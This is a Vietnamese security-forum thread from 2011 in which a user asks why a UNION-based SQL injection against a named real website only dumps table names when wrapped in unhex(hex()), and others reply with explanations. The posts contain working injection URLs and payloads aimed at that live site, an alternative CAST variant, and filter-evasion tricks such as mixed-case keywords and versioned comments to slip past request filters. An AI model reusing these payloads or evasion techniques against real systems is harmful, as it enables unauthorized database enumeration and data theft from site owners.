banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập phải chăng là 1 kiểu bypass SQL injection??  XML
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 19/08/2011 14:42:37 (+0700) | #1 | 245333
viet.ict.hut
Member

[Minus]    0    [Plus]
Joined: 27/04/2010 07:30:53
Messages: 1
Offline
[Profile] [PM]
các bạn ơi cho mình hỏi tại sao trang lỗi này: http://vainham.com
khi mình viết :
http://vainham.com/home/?frame=product_detail&id=-207 UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--

thì không ra kết quả nào, mà khi viết:
http://vainham.com/home/?frame=product_detail&id=-207 UNION SELECT 1,2,3,4,5,group_concat(unhex(hex(table_name))),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--

thì tuôn ra ào ào.vấn đề này mình không hiểu nổi.mong các bạn giải thích giùm.smilie
[Up] [Print Copy]
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 19/08/2011 15:24:03 (+0700) | #2 | 245337
mapthulu
Member

[Minus]    0    [Plus]
Joined: 10/06/2011 12:16:42
Messages: 28
Offline
[Profile] [PM]
Cú pháp ở đoạn 2 buộc các tên bảng phải được dịch sang hex (vì server được cấu hình hiểu hex)
unhex thì giải mã để đưa ra cho người đọc

Nôm na vậy
[Up] [Print Copy]
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 19/08/2011 20:31:10 (+0700) | #3 | 245370
[Avatar]
WinDak
Researcher

Joined: 27/01/2002 11:15:00
Messages: 223
Offline
[Profile] [PM]
cái dưới này cũng work smilie.

-207 UNION SELECT 1,2,3,4,5,group_concat( CAST(table_name AS BINARY) ),7,8,9,10,11,12,13,14,15,16 from information_schema.tables--

cái union có thể bị illegal collation nếu data type không đồng bộ unhex(hex()) là một trick hay để bypass !


-- w~ --
[Up] [Print Copy]
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 20/08/2011 07:43:32 (+0700) | #4 | 245397
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Đây không phải là 1 kiểu lỗi, nói đúng hơn là website đó bị dính lỗi SQL injection
[Up] [Print Copy]
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 20/08/2011 12:36:34 (+0700) | #5 | 245409
[Avatar]
chiro8x
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 00:38:37
Messages: 661
Location: /home/chiro8x
Offline
[Profile] [PM] [Yahoo!]

mv1098 wrote:
Đây không phải là 1 kiểu lỗi, nói đúng hơn là website đó bị dính lỗi SQL injection 

Có hiểu nội dung bài viết không đây smilie. Tự tin ghê.
while(1){}
[Up] [Print Copy]
  [Question]   phải chăng là 1 kiểu bypass SQL injection?? 21/08/2011 07:16:51 (+0700) | #6 | 245453
[Avatar]
.lht.
Member

[Minus]    0    [Plus]
Joined: 26/09/2010 10:06:38
Messages: 75
Location: Inside you
Offline
[Profile] [PM]
Ở đây bạn phải chia ra rõ ràng là câu truy vấn đó đựoc cản lọc ở tầng nào :

Querry -> Cản lọc request của server -> Cản lọc trong mã nguồn của site -> SQL

thường thì họ cấu hình chặn 1 số request có chứa những cụm từ hay kí tự (select, union, table_name, ...) ở request đến server hay có hàm cản lọc trong bản thân mã nguồn website.

Ở bước này còn tuỳ trường hợp mà bạn có thể khai thác, ví dụ nếu chặn select (viết thường) cùng với server nó phân biệt select và SeLecT khác nhau -> khi bạn viết SeLecT hay /*!0000SeLect*/ thì sẽ qua mặt được và đến phần SQL thực thi câu querry. Lúc này SQL nó vẫn hiểu SeLecT và vẫn thực thi bình thường.
Tuơng tự như vậy với hex() và unhex() ... và cũng như WinDak nói là :



cái union có thể bị illegal collation nếu data type không đồng bộ unhex(hex()) là một trick hay để bypass !
 
Trash from trash is the place for new good things ~
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|